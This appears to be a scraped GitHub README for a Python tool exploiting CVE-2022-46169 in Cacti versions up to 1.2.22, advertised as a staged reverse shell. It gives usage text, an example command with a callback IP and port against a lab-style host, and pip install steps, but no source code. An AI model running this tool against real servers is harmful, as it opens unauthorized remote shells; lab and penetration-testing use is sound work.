BKreisel / CVE-2022-46169

🐍 Python Exploit for CVE-2022-46169

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-41343

🐍 Python Exploit for CVE-2022-46169

Staged Reverse Shell for Cacti <= 1.2.22

Example

cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb

Usage

usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Cacti Server URL
  -s SHELL, --shell SHELL
                        Remote Shell (default: /bin/bash)

PyPi Installation

python3 -m pip install cve-2022-46169

Manual Installation

python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo

About

🐍 Python Exploit for CVE-2022-46169

License:MIT License


Languages

Language:Python 100.0%